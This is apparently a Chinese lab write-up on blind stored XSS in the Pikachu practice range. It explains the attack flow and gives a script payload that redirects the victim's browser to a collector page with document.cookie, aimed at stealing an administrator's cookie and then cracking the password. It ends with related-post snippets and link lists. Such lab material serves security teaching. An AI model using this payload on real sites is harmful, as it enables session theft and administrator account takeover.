Pikachu靶场:XSS盲打
Pikachu靶场:XSS盲打
实验环境以及工具
Firefox浏览器、Burp Suite、Pikachu靶场
实验原理
●xss盲打也是属于存储型XSS类型
盲打的意思是无法直接在前端看到反馈效果。
xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。
形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS
XSS盲打测试流程
1.在目标站点上找到输入点,比如查询接口,留言板等;
2.输入一组“特殊字符+唯一识别字符”,点击提交后,等待目标上线触发;
3.在XSS后台中查看结果
具体操作
1.在目标站点上找到输入点,比如留言板,问卷调查等
2.构造payload进行注入
<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
3.后台等待对方登录
利用hash-identifier判断加密类型
利用在线解密进行解密
总结
XSS盲打的攻击目标是后台管理员,在前端利用输入接口进行攻击,输入的js代码被存储到了数据库中,在管理员登录的时候被触发。盗取管理员cookie后即刻进行管理员密码破解。
Pikachu靶场:XSS盲打相关推荐
- Pikachu靶场之(XSS盲打)
Pikachu靶场XSS盲打 1.靶场及源代码检查 发现就是一个简单的Form提交表单到后台,没什么利用的地方. 查看一下提示: 填一个表单然后进后台看看: 管理员进入后台查看: 2.利用在前台也就是 ...
- XSS学习-pikachu靶场之xss
XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击 ...
- [ pikachu ] 靶场通关之 XSS (一) --- 概述
暴力破解的字典 链接:https://pan.baidu.com/s/1Tr7ONqDGA0u5kMOfN6oR1A 提取码:qvo2 XSS (跨站脚本)概述 目录 XSS (跨站脚本)概述 跨 ...
- [NOTE] Pikachu靶场练习笔记
[NOTE] Pikachu靶场练习笔记 文章目录 [NOTE] Pikachu靶场练习笔记 前言 暴力破解 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) t ...
- Pikachu靶场练习
Pikachu靶场练习 自己学习用的,写不不好不准说我. 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶 ...
- pikachu靶场通关
pikachu靶场通关详解 一.靶场介绍 二.靶场配置 三.靶场实战 3.1 暴力破解漏洞 3.1.1暴力破解攻击&暴力破解漏洞概述 3.1.2暴力破解漏洞测试流程 3.1.3基于表单的暴力破 ...
- 攻防系列——pikachu靶场通关练习
目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...
- Pikachu靶场通关记录(详细)
Pikachu靶场通关记录 0x01 靶场介绍 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么 ...
- pikachu靶场通关技巧详解
目录 一.暴力破解 二.Cross-Site Scripting(XSS跨站脚本攻击) 三.CSRF(跨站请求伪造) 四.SQL-Inject 五.RCE 六.File Inclusion(文件包含漏 ...
最新文章
- 【CyberSecurityLearning 附】OpenVAS安装
- CISCO 2950,3550交换机的端口隔离
- c语言考试常考试卷,c语言面试最必考的十道试题,求职必看!!!
- 从统计代码来谈JS加载的优化
- lua能在stm32arm上运行吗_IOS App能在Mac运行!苹果这黑科技能撼动微软吗?
- 从微博部分功能学习UWP技术
- Windows远程桌面连接(有密码和无密码连接)
- jsp+mysql校园卡管理系统设计与实现
- VB程序设计教程(第四版)龚沛曾-实验8-3
- (新手必备)电子电路里面你必须知道的知识!!!
- 支持simnow模拟,特别适合炒单使用的CTP期货交易终端(看穿式)
- 组合排列中重复数问题
- linux实用技巧:通过命令行安装deb软件包
- 解决阿里云OSS使用URL无法访问图片
- 超越卷积、自注意力机制:强大的神经网络新算子involution(连算子都内卷= =)
- 安卓投屏神器scrcpy
- TI单芯片毫米波雷达软件架构研究(一)
- python创建模式对象_【python设计模式-创建型】单例模式
- SAP MM模块常用表总结
- 抖音短视频如何做到“精准获客”
热门文章
- pandas常用操作以及eda分析笔记(自用)
- redis-GEO地理位置
- 计算机的用户终端,计算机终端、客户端、服务端都是什么概念,他们之间的区别是什么?谢谢,大家,小弟是菜鸟...
- Silverlight 2.5D RPG游戏技巧与特效处理:(十四)体感系统
- flash 磨损均衡处理
- 时光金科php_重庆金科博翠宸章 | ACA麦垦景观
- 北美华人第一大折扣信息网站。北美省钱快报是北美最有人气的微博,北美省钱快报是新浪折扣频道独家合作伙伴...
- MarkMan – 马克鳗,让设计更有爱!
- 有哪些在成都开了 20 年以上的味道不错的小饭馆
- qpython3使用手册图_qpython 图